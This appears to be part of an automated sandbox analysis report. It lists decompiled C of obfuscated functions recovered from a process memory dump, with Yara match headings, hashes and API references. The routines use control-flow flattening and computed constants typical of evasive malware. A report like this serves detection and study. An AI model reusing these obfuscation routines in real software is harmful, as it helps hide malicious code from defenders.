                                              											if(_t168 != 0) {
                                              												_t173 = 0x6adc8a5;
                                              												goto L1;
                                              											}
                                              										} else {
                                              											if(_t173 == _t166) {
                                              												E0023507B(_v72, _v24, _v28, _v76, _t204);
                                              												_t205 =  &(_t205[3]);
                                              												_t196 =  !=  ? 1 : _t196;
                                              												_t173 = 0x17a504e8;
                                              												while(1) {
                                              													L1:
                                              													_t191 = 0x5c;
                                              													goto L2;
                                              												}
                                              											} else {
                                              												if(_t173 == 0x17a504e8) {
                                              													E00225FB2(_v32, _v60, _t204);
                                              													_t173 = 0x3fc1d7;
                                              													while(1) {
                                              														L1:
                                              														_t191 = 0x5c;
                                              														L2:
                                              														goto L3;
                                              													}
                                              												} else {
                                              													if(_t173 != 0x1e312b00) {
                                              														goto L21;
                                              													} else {
                                              														_t173 = 0x353ab5a;
                                              														continue;
                                              													}
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              								goto L22;
                                              							}
                                              							E00225FB2(_v36, _v12, _t172);
                                              							_t173 = 0x26181ebc;
                                              							_t166 = 0xd265085;
                                              							_t191 = 0x5c;
                                              							L21:
                                              						} while (_t173 != 0x26181ebc);
                                              						L22:
                                              						return _t196;
                                              					}
                                              				}
                                              			}






































                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
                                              • API String ID: 0-175875280
                                              • Opcode ID: a92a726d8a74cd5cba0f208e5eb44e929de75e5fdfdff0b642b2397bf8ce9080
                                              • Instruction ID: 903ed4379af4905ed60686a31a040a493c1a3705d5d88ccc40404fce79c10416
                                              • Opcode Fuzzy Hash: a92a726d8a74cd5cba0f208e5eb44e929de75e5fdfdff0b642b2397bf8ce9080
                                              • Instruction Fuzzy Hash: B08146B1118381AFD758CF24C49A81BBBF5FBC4358F504A1DF686566A0C7B58958CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00232349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                              				char _v16;
                                              				char _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				void* _t153;
                                              				void* _t168;
                                              				signed int _t172;
                                              				char _t177;
                                              				signed int _t178;
                                              				void* _t181;
                                              				char* _t186;
                                              				signed int _t206;
                                              				signed int _t207;
                                              				signed int _t208;
                                              				signed int _t209;
                                              				signed int _t210;
                                              				signed int* _t214;
                                              
                                              				_push(_a16);
                                              				_push(0x40);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t153);
                                              				_v20 = 0x10;
                                              				_t214 =  &(( &_v80)[6]);
                                              				_v60 = 0xafa2;
                                              				_v60 = _v60 ^ 0xad7cd4b0;
                                              				_t178 = 0;
                                              				_v60 = _v60 | 0x7a339cd1;
                                              				_t181 = 0x15b39dc0;
                                              				_v60 = _v60 ^ 0xff7ff485;
                                              				_v64 = 0xe220;
                                              				_v64 = _v64 >> 2;
                                              				_v64 = _v64 | 0x618d1066;
                                              				_v64 = _v64 ^ 0x618d4123;
                                              				_v28 = 0xfe94;
                                              				_t206 = 0x17;
                                              				_v28 = _v28 / _t206;
                                              				_v28 = _v28 ^ 0x000043c3;
                                              				_v32 = 0x6fe3;
                                              				_v32 = _v32 >> 1;
                                              				_v32 = _v32 ^ 0x000078b7;
                                              				_v36 = 0x3688;
                                              				_t207 = 0x69;
                                              				_v36 = _v36 * 0x5a;
                                              				_v36 = _v36 ^ 0x00137d17;
                                              				_v24 = 0x8157;
                                              				_v24 = _v24 | 0x6dbfc3a0;
                                              				_v24 = _v24 ^ 0x6dbfb45a;
                                              				_v80 = 0xe945;
                                              				_v80 = _v80 / _t207;
                                              				_v80 = _v80 ^ 0xcc46d226;
                                              				_t208 = 0x62;
                                              				_v80 = _v80 / _t208;
                                              				_v80 = _v80 ^ 0x0215c355;
                                              				_v48 = 0x42ef;
                                              				_v48 = _v48 + 0xffff3840;
                                              				_v48 = _v48 << 4;
                                              				_v48 = _v48 ^ 0xfff789fd;
                                              				_v72 = 0xbf2b;
                                              				_v72 = _v72 | 0xc326a1c7;
                                              				_t209 = 0x4b;
                                              				_v72 = _v72 / _t209;
                                              				_v72 = _v72 | 0xd12f9700;
                                              				_v72 = _v72 ^ 0xd3bfbe8a;
                                              				_v52 = 0xfa61;
                                              				_v52 = _v52 << 3;
                                              				_v52 = _v52 + 0x5488;
                                              				_v52 = _v52 ^ 0x00084626;
                                              				_v56 = 0xb5dc;
                                              				_v56 = _v56 | 0x6ca6e5ac;
                                              				_v56 = _v56 * 0x5e;
                                              				_v56 = _v56 ^ 0xe54e28a7;
                                              				_v76 = 0xbf9d;
                                              				_v76 = _v76 + 0xdb7b;
                                              				_v76 = _v76 + 0xffff5618;
                                              				_v76 = _v76 | 0xc179f847;
                                              				_v76 = _v76 ^ 0xc1798349;
                                              				_v40 = 0xd8e6;
                                              				_v40 = _v40 + 0x2ceb;
                                              				_v40 = _v40 + 0x406a;
                                              				_v40 = _v40 ^ 0x0001168e;
                                              				_v68 = 0x1b9c;
                                              				_t210 = 0x7a;
                                              				_v68 = _v68 * 0x38;
                                              				_v68 = _v68 + 0xa456;
                                              				_v68 = _v68 >> 0xe;
                                              				_v68 = _v68 ^ 0x00002836;
                                              				_v44 = 0x7a08;
                                              				_v44 = _v44 << 0xd;
                                              				_v44 = _v44 / _t210;
                                              				_v44 = _v44 ^ 0x00205e6a;
                                              				while(_t181 != 0x12ef740) {
                                              					if(_t181 == 0x13e246ff) {
                                              						__eflags = _v16;
                                              						_t186 =  &_v16;
                                              						while(__eflags != 0) {
                                              							_t177 =  *_t186;
                                              							__eflags = _t177 - 0x30;
                                              							if(_t177 < 0x30) {
                                              								L11:
                                              								__eflags = _t177 - 0x61;
                                              								if(_t177 < 0x61) {
                                              									L13:
                                              									__eflags = _t177 - 0x41;
                                              									if(_t177 < 0x41) {
                                              										L15:
                                              										 *_t186 = 0x58;
                                              									} else {
                                              										__eflags = _t177 - 0x5a;
                                              										if(_t177 > 0x5a) {
                                              											goto L15;
                                              										}
                                              									}
                                              								} else {
                                              									__eflags = _t177 - 0x7a;
                                              									if(_t177 > 0x7a) {
                                              										goto L13;
                                              									}
                                              								}
                                              							} else {
                                              								__eflags = _t177 - 0x39;
                                              								if(_t177 > 0x39) {
                                              									goto L11;
                                              								}
                                              							}
                                              							_t186 = _t186 + 1;
                                              							__eflags =  *_t186;
                                              						}
                                              						_t181 = 0x12ef740;
                                              						continue;
                                              					} else {
                                              						if(_t181 == 0x15b39dc0) {
                                              							_t181 = 0x3a71512f;
                                              							continue;
                                              						} else {
                                              							if(_t181 != 0x3a71512f) {
                                              								L19:
                                              								__eflags = _t181 - 0x2b24b5a2;
                                              								if(__eflags != 0) {
                                              									continue;
                                              								}
                                              							} else {
                                              								if(E0022602C(_v60,  &_v16,  &_v20, _v64) != 0) {
                                              									_t181 = 0x13e246ff;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					return _t178;
                                              				}
                                              				_push(0x23c030);
                                              				_push(_v36);
                                              				_t168 = E0023878F(_v28, _v32, __eflags);
                                              				E002331E2(__eflags);
                                              				_t143 =  &_v56; // 0x205e6a
                                              				_t172 = E00236A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
                                              				__eflags = _t172;
                                              				_t152 = _t172 > 0;
                                              				__eflags = _t152;
                                              				_t178 = 0 | _t152;
                                              				E00232025(_v40, _t168, _v68, _v44);
                                              				_t214 =  &(_t214[0xc]);
                                              				_t181 = 0x2b24b5a2;
                                              				goto L19;
                                              			}


































                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
                                              • API String ID: 0-892457230
                                              • Opcode ID: 815ccb0c11ee2661b8ec0aee63e4ebf47096eb6e404b8ed23255f29f08f704cd
                                              • Instruction ID: 36500fddb28fb2357b03d4c0059b81775772d61e15009448fdf384df6c250f90
                                              • Opcode Fuzzy Hash: 815ccb0c11ee2661b8ec0aee63e4ebf47096eb6e404b8ed23255f29f08f704cd
                                              • Instruction Fuzzy Hash: 568174B1519341DFD768CF25C98A51BBBE1BBC0B18F90490DF1859A2A0D7B5CA1ACF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
                                              • CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
                                              • PropVariantClear.OLE32(?), ref: 10002E75
                                              • SysFreeString.OLEAUT32(00000000), ref: 10002E7E
                                              • SysFreeString.OLEAUT32(00000000), ref: 10002E97
                                              Strings
                                              • <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: String$Free$AllocClearCreateInstancePropVariant
                                              • String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
                                              • API String ID: 2501108336-1018649646
                                              • Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                              • Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
                                              • Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                              • Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E00239B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                              				signed int* _v4;
                                              				char _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				intOrPtr _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				unsigned int _v112;
                                              				signed int _v116;
                                              				void* _t241;
                                              				intOrPtr _t259;
                                              				void* _t260;
                                              				intOrPtr _t268;
                                              				intOrPtr _t269;
                                              				intOrPtr _t270;
                                              				intOrPtr _t274;
                                              				intOrPtr* _t281;
                                              				signed int _t283;
                                              				void* _t315;
                                              				intOrPtr* _t316;
                                              				signed int _t317;
                                              				signed int _t318;
                                              				signed int _t319;
                                              				signed int _t320;
                                              				signed int _t321;
                                              				signed int* _t322;
                                              				signed int* _t325;
                                              				void* _t327;
                                              
                                              				_t281 = _a8;
                                              				_push(_t281);
                                              				_push(_a4);
                                              				_t316 = __ecx;
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t241);
                                              				_v76 = 0xd801;
                                              				_t325 =  &(( &_v116)[4]);
                                              				_v76 = _v76 >> 6;
                                              				_t315 = 0;
                                              				_t283 = 0xafaf7d2;
                                              				_t317 = 6;
                                              				_v76 = _v76 * 0x2a;
                                              				_v76 = _v76 ^ 0x0000b202;
                                              				_v80 = 0xa1a8;
                                              				_v80 = _v80 | 0xe917477a;
                                              				_v80 = _v80 << 2;
                                              				_v80 = _v80 ^ 0xa45f8c0e;
                                              				_v84 = 0x144b;
                                              				_v84 = _v84 + 0xffffbc75;
                                              				_v84 = _v84 * 0x6d;
                                              				_v84 = _v84 ^ 0xffeb93ca;
                                              				_v52 = 0x2e4b;
                                              				_v52 = _v52 | 0x557249c0;
                                              				_v52 = _v52 ^ 0x346b51fe;
                                              				_v52 = _v52 ^ 0x611902e1;
                                              				_v56 = 0xfad0;
                                              				_v56 = _v56 + 0xffff1342;
                                              				_v56 = _v56 ^ 0x8fd20197;
                                              				_v56 = _v56 ^ 0x8fd21d65;
                                              				_v96 = 0x8e39;
                                              				_v96 = _v96 + 0xd833;
                                              				_v96 = _v96 + 0xffffc0bd;
                                              				_v96 = _v96 >> 0xa;
                                              				_v96 = _v96 ^ 0x000036ba;
                                              				_v12 = 0xb209;
                                              				_v12 = _v12 ^ 0xf6f529e5;
                                              				_v12 = _v12 ^ 0xf6f5ec43;
                                              				_v64 = 0xc247;
                                              				_v64 = _v64 + 0xffff53d4;
                                              				_v64 = _v64 << 9;
                                              				_v64 = _v64 ^ 0x002c2f20;
                                              				_v100 = 0x41c0;
                                              				_v100 = _v100 | 0x528356d8;
                                              				_v100 = _v100 ^ 0x6d95e5a5;
                                              				_v100 = _v100 >> 1;
                                              				_v100 = _v100 ^ 0x1f8b2fe0;
                                              				_v16 = 0x904b;
                                              				_v16 = _v16 + 0x3d62;
                                              				_v16 = _v16 ^ 0x0000a85c;
                                              				_v68 = 0xf7e0;
                                              				_v68 = _v68 | 0xcc3d0ce1;
                                              				_v68 = _v68 >> 7;
                                              				_v68 = _v68 ^ 0x01982b66;
                                              				_v72 = 0x69a0;
                                              				_v72 = _v72 / _t317;
                                              				_v72 = _v72 ^ 0xd5ac5c66;
                                              				_v72 = _v72 ^ 0xd5ac219b;
                                              				_v20 = 0x9739;
                                              				_v20 = _v20 << 2;
                                              				_v20 = _v20 ^ 0x000260e8;
                                              				_v24 = 0xc564;
                                              				_t318 = 0x2c;
                                              				_v24 = _v24 / _t318;
                                              				_v24 = _v24 ^ 0x00005d30;
                                              				_v88 = 0xe78a;
                                              				_v88 = _v88 >> 1;
                                              				_v88 = _v88 << 4;
                                              				_v88 = _v88 ^ 0x00070feb;
                                              				_v28 = 0x7421;
                                              				_v28 = _v28 + 0xffff545c;
                                              				_v28 = _v28 ^ 0xfffff127;
                                              				_v32 = 0x3ef3;
                                              				_t319 = 0x23;
                                              				_v32 = _v32 * 0x1e;
                                              				_v32 = _v32 ^ 0x00070388;
                                              				_v36 = 0x1f6a;
                                              				_v36 = _v36 << 0xa;
                                              				_v36 = _v36 ^ 0x007d8833;
                                              				_v104 = 0xc791;
                                              				_v104 = _v104 + 0xffffa2ac;
                                              				_v104 = _v104 * 0x2b;
                                              				_v104 = _v104 + 0x587f;
                                              				_v104 = _v104 ^ 0x00127594;
                                              				_v40 = 0xa663;
                                              				_v40 = _v40 + 0xffffc5d4;
                                              				_v40 = _v40 ^ 0x00001ad7;
                                              				_v44 = 0x2b76;
                                              				_v44 = _v44 << 0xc;
                                              				_v44 = _v44 ^ 0x02b774b0;
                                              				_v92 = 0xa27;
                                              				_v92 = _v92 / _t319;
                                              				_v92 = _v92 + 0xffff3569;
                                              				_v92 = _v92 ^ 0xffff2eae;
                                              				_v108 = 0xf211;
                                              				_t320 = 0x54;
                                              				_v108 = _v108 / _t320;
                                              				_v108 = _v108 >> 0xb;
                                              				_v108 = _v108 | 0x89ac3126;
                                              				_v108 = _v108 ^ 0x89ac4c52;
                                              				_v112 = 0x8d71;
                                              				_v112 = _v112 >> 0xa;
                                              				_v112 = _v112 | 0xeb52e524;
                                              				_v112 = _v112 >> 4;
                                              				_v112 = _v112 ^ 0x0eb57242;
                                              				_v48 = 0x270e;
                                              				_v48 = _v48 | 0xda2d7f86;
                                              				_v48 = _v48 ^ 0xda2d74b2;
                                              				_v116 = 0xd303;
                                              				_v116 = _v116 ^ 0x52d81e99;
                                              				_t321 = 0x2e;
                                              				_t322 = _v4;
                                              				_v116 = _v116 / _t321;
                                              				_v116 = _v116 * 0x47;
                                              				_v116 = _v116 ^ 0x7fdf43a3;
                                              				while(1) {
                                              					_t258 = _v60;
                                              					while(1) {
                                              						L2:
                                              						_t327 = _t283 - 0x1af8f879;
                                              						if(_t327 <= 0) {
                                              							break;
                                              						}
                                              						if(_t283 == 0x20f5637b) {
                                              							_t259 =  *0x23ca20; // 0x0
                                              							_t260 = E00231B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
                                              							_t325 =  &(_t325[5]);
                                              							if(_t260 == 0) {
                                              								_t283 = 0x33905d8a;
                                              								L26:
                                              								if(_t283 == 0xc271ab7) {
                                              									L30:
                                              									return _t315;
                                              								}
                                              								while(1) {
                                              									_t258 = _v60;
                                              									goto L2;
                                              								}
                                              							}
                                              							_t283 = 0x1af8f879;
                                              							while(1) {
                                              								_t258 = _v60;
                                              								goto L2;
                                              							}
                                              						}
                                              						if(_t283 == 0x28aacb6e) {
                                              							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
                                              								goto L30;
                                              							}
                                              							_t283 = 0x351bb9b3;
                                              							continue;
                                              						}
                                              						if(_t283 == 0x33905d8a) {
                                              							if(_t315 == 0) {
                                              								E0022F536(_v52, _v56, _v96,  *_t316);
                                              							}
                                              							goto L30;
                                              						}
                                              						if(_t283 != 0x351bb9b3) {
                                              							goto L26;
                                              						}
                                              						_t283 = 0xa3bf63c;
                                              					}
                                              					if(_t327 == 0) {
                                              						E00232674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
                                              						_t325 =  &(_t325[5]);
                                              						_t283 = 0xc483d1b;
                                              						while(1) {
                                              							_t258 = _v60;
                                              							goto L2;
                                              						}
                                              					}
                                              					if(_t283 == 0xa3bf63c) {
                                              						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
                                              						_push(_t283);
                                              						_push(_t283);
                                              						_t268 = E00228736( *((intOrPtr*)(_t316 + 4)));
                                              						 *_t316 = _t268;
                                              						if(_t268 == 0) {
                                              							goto L30;
                                              						}
                                              						_t269 =  *_t281;
                                              						_t283 = 0x20f5637b;
                                              						_v4 = _t269;
                                              						_t258 = _t269 + 0x74;
                                              						_v60 = _t269 + 0x74;
                                              						_t322 =  &_v116;
                                              						goto L2;
                                              					}
                                              					if(_t283 == 0xafaf7d2) {
                                              						_t283 = 0x28aacb6e;
                                              						goto L2;
                                              					}
                                              					if(_t283 == 0xc483d1b) {
                                              						_t270 =  *0x23ca20; // 0x0
                                              						E002255D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
                                              						_t325 =  &(_t325[0xa]);
                                              						asm("sbb ecx, ecx");
                                              						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
                                              						while(1) {
                                              							_t258 = _v60;
                                              							goto L2;
                                              						}
                                              					}
                                              					if(_t283 == 0x19944913) {
                                              						_t274 =  *0x23ca20; // 0x0
                                              						_push(_t283);
                                              						_push(_t283);
                                              						E0023838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
                                              						_t325 =  &(_t325[8]);
                                              						_t315 =  !=  ? 1 : _t315;
                                              						_t283 = 0x199ab82a;
                                              						while(1) {
                                              							_t258 = _v60;
                                              							goto L2;
                                              						}
                                              					}
                                              					if(_t283 != 0x199ab82a) {
                                              						goto L26;
                                              					}
                                              					_push(_t283);
                                              					_push(_t283);
                                              					E00225F43(_t283, _v8);
                                              					_t283 = 0x33905d8a;
                                              				}
                                              			}


                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: /,$!t$$R$'$0]$K.$b=$v+
                                              • API String ID: 0-2997250437
                                              • Opcode ID: 5fa90e81b1bdc2b0b43200c452c890c42120ed03d176507ae4c8609dc28830e2
                                              • Instruction ID: f8d2033a7d0a6587f36d9b6813c2f5ab1cebf6a57be5430e841a5063d0e4d914
                                              • Opcode Fuzzy Hash: 5fa90e81b1bdc2b0b43200c452c890c42120ed03d176507ae4c8609dc28830e2
                                              • Instruction Fuzzy Hash: 7DD133B11187418FE768CF65C48991BBBF1FB84708F208A1DF5D6862A0D7BAC959CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E002312E2() {
                                              				char _v520;
                                              				char _v1040;
                                              				signed int _v1044;
                                              				signed int _v1048;
                                              				intOrPtr _v1052;
                                              				intOrPtr _v1056;
                                              				signed int _v1060;
                                              				signed int _v1064;
                                              				signed int _v1068;
                                              				signed int _v1072;
                                              				signed int _v1076;
                                              				signed int _v1080;
                                              				signed int _v1084;
                                              				signed int _v1088;
                                              				signed int _v1092;
                                              				signed int _v1096;
                                              				signed int _v1100;
                                              				signed int _v1104;
                                              				signed int _v1108;
                                              				signed int _v1112;
                                              				unsigned int _v1116;
                                              				signed int _v1120;
                                              				signed int _v1124;
                                              				signed int _v1128;
                                              				signed int _v1132;
                                              				signed int _v1136;
                                              				signed int _v1140;
                                              				signed int _v1144;
                                              				signed int _v1148;
                                              				short* _t246;
                                              				intOrPtr _t256;
                                              				void* _t257;
                                              				void* _t261;
                                              				void* _t271;
                                              				intOrPtr _t293;
                                              				signed int _t297;
                                              				signed int _t298;
                                              				signed int _t299;
                                              				signed int _t300;
                                              				signed int _t301;
                                              				signed int _t302;
                                              				signed int _t303;
                                              				signed int* _t306;
                                              
                                              				_t306 =  &_v1148;
                                              				_v1048 = _v1048 & 0x00000000;
                                              				_v1044 = _v1044 & 0x00000000;
                                              				_t261 = 0x1f2b77a6;
                                              				_v1056 = 0x1c0398;
                                              				_v1052 = 0x1a4c8e;
                                              				_v1080 = 0xed6b;
                                              				_v1080 = _v1080 + 0xffffb43c;
                                              				_v1080 = _v1080 ^ 0x000092bf;
                                              				_v1104 = 0xc4aa;
                                              				_v1104 = _v1104 * 0x6d;
                                              				_t297 = 0x23;
                                              				_v1104 = _v1104 / _t297;
                                              				_v1104 = _v1104 ^ 0x00022488;
                                              				_v1112 = 0xb9;
                                              				_v1112 = _v1112 + 0xffff6145;
                                              				_v1112 = _v1112 + 0xc51a;
                                              				_v1112 = _v1112 ^ 0x0000206d;
                                              				_v1132 = 0x8b7;
                                              				_v1132 = _v1132 + 0xffff38b6;
                                              				_v1132 = _v1132 ^ 0xb2a0a749;
                                              				_t298 = 0x57;
                                              				_v1132 = _v1132 / _t298;
                                              				_v1132 = _v1132 ^ 0x00e3f1cf;
                                              				_v1084 = 0x5f6a;
                                              				_v1084 = _v1084 << 0xa;
                                              				_v1084 = _v1084 ^ 0x017dcd17;
                                              				_v1108 = 0xc835;
                                              				_v1108 = _v1108 >> 0xd;
                                              				_t51 =  &_v1108; // 0xd
                                              				_t299 = 3;
                                              				_v1108 =  *_t51 * 7;
                                              				_v1108 = _v1108 ^ 0x00005049;
                                              				_v1100 = 0x845e;
                                              				_v1100 = _v1100 + 0x74c1;
                                              				_v1100 = _v1100 << 3;
                                              				_v1100 = _v1100 ^ 0x0007b300;
                                              				_v1116 = 0xc35d;
                                              				_v1116 = _v1116 * 0x33;
                                              				_v1116 = _v1116 >> 9;
                                              				_v1116 = _v1116 ^ 0x000042ed;
                                              				_v1120 = 0x8ea6;
                                              				_v1120 = _v1120 >> 2;
                                              				_v1120 = _v1120 | 0xab635639;
                                              				_v1120 = _v1120 ^ 0xab63670d;
                                              				_v1092 = 0x4c03;
                                              				_v1092 = _v1092 | 0x601fb915;
                                              				_v1092 = _v1092 ^ 0x04845a80;
                                              				_v1092 = _v1092 ^ 0x649be272;
                                              				_v1076 = 0x4c13;
                                              				_v1076 = _v1076 * 0x2c;
                                              				_v1076 = _v1076 ^ 0x000d0b59;
                                              				_v1068 = 0x8d71;
                                              				_v1068 = _v1068 / _t299;
                                              				_v1068 = _v1068 ^ 0x0000326e;
                                              				_v1064 = 0xd7a3;
                                              				_v1064 = _v1064 >> 0xd;
                                              				_v1064 = _v1064 ^ 0x00005df9;
                                              				_v1060 = 0xed2b;
                                              				_v1060 = _v1060 ^ 0x64d9e662;
                                              				_v1060 = _v1060 ^ 0x64d941f5;
                                              				_v1148 = 0x8835;
                                              				_v1148 = _v1148 + 0xffffd4eb;
                                              				_t300 = 0x61;
                                              				_v1148 = _v1148 * 0x34;
                                              				_v1148 = _v1148 + 0x9f16;
                                              				_v1148 = _v1148 ^ 0x0013bc95;
                                              				_v1140 = 0x3032;
                                              				_v1140 = _v1140 / _t300;
                                              				_v1140 = _v1140 | 0x38ef646c;
                                              				_t125 =  &_v1140; // 0x38ef646c
                                              				_t301 = 0x36;
                                              				_v1140 =  *_t125 / _t301;
                                              				_v1140 = _v1140 ^ 0x010de54d;
                                              				_v1124 = 0xc110;
                                              				_v1124 = _v1124 << 7;
                                              				_t302 = 0x3f;
                                              				_v1124 = _v1124 / _t302;
                                              				_v1124 = _v1124 ^ 0x00019318;
                                              				_v1136 = 0x6a8;
                                              				_v1136 = _v1136 ^ 0x800f5fd5;
                                              				_v1136 = _v1136 ^ 0x17dc092f;
                                              				_t303 = 0x37;
                                              				_v1136 = _v1136 * 0x45;
                                              				_v1136 = _v1136 ^ 0xebf4d978;
                                              				_v1144 = 0x9345;
                                              				_v1144 = _v1144 | 0xef963ffb;
                                              				_v1144 = _v1144 / _t303;
                                              				_v1144 = _v1144 ^ 0x045b7df9;
                                              				_v1128 = 0xf550;
                                              				_v1128 = _v1128 + 0xffff8b4b;
                                              				_v1128 = _v1128 >> 1;
                                              				_v1128 = _v1128 >> 8;
                                              				_v1128 = _v1128 ^ 0x00000cb5;
                                              				_v1072 = 0xd52f;
                                              				_v1072 = _v1072 ^ 0xc146d284;
                                              				_v1072 = _v1072 ^ 0xc146011a;
                                              				_v1088 = 0xae87;
                                              				_v1088 = _v1088 | 0xff36597f;
                                              				_v1088 = _v1088 ^ 0xff36d7e8;
                                              				_v1096 = 0xe081;
                                              				_v1096 = _v1096 ^ 0xf8f61e03;
                                              				_v1096 = _v1096 + 0xffff4bc3;
                                              				_v1096 = _v1096 ^ 0xf8f624ac;
                                              				do {
                                              					while(_t261 != 0xe2b4321) {
                                              						if(_t261 == 0x123adc07) {
                                              							E0022B75F();
                                              							_t261 = 0x38f4cd20;
                                              							continue;
                                              						}
                                              						if(_t261 == 0x15946a4d) {
                                              							_t246 = E002228CE( &_v520, _v1128, _v1072);
                                              							__eflags = 0;
                                              							 *_t246 = 0;
                                              							return E00225AEA(_v1088, _v1096,  &_v520);
                                              						}
                                              						if(_t261 == 0x1dde1df8) {
                                              							_push(_t261);
                                              							E0023A889(_v1068, _v1064,  &_v1040);
                                              							E00222BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
                                              							_t212 =  &_v1136; // 0xd
                                              							_push( &_v1040);
                                              							_push( &_v520);
                                              							E00227B63( *_t212, _v1144, __eflags);
                                              							_t306 =  &(_t306[0xa]);
                                              							_t261 = 0x15946a4d;
                                              							continue;
                                              						}
                                              						if(_t261 == 0x1f2b77a6) {
                                              							_t256 =  *0x23ca2c; // 0x4d8300
                                              							__eflags =  *((intOrPtr*)(_t256 + 0x224));
                                              							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
                                              							continue;
                                              						}
                                              						_t313 = _t261 - 0x38f4cd20;
                                              						if(_t261 != 0x38f4cd20) {
                                              							goto L12;
                                              						}
                                              						_push(_v1132);
                                              						_t257 = E0023889D(0x23c9b0, _v1112, _t313);
                                              						_pop(_t271);
                                              						_t193 =  &_v1116; // 0xd
                                              						_t293 =  *0x23ca2c; // 0x4d8300
                                              						_t197 = _t293 + 0x230; // 0x700047
                                              						E0022C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x23ca2c, _t257,  &_v520);
                                              						_t256 = E00232025(_v1120, _t257, _v1092, _v1076);
                                              						_t306 =  &(_t306[9]);
                                              						_t261 = 0x1dde1df8;
                                              					}
                                              					E002363C1();
                                              					_t261 = 0x38f4cd20;
                                              					L12:
                                              					__eflags = _t261 - 0x3a4044d2;
                                              				} while (__eflags != 0);
                                              				return _t256;
                                              			}

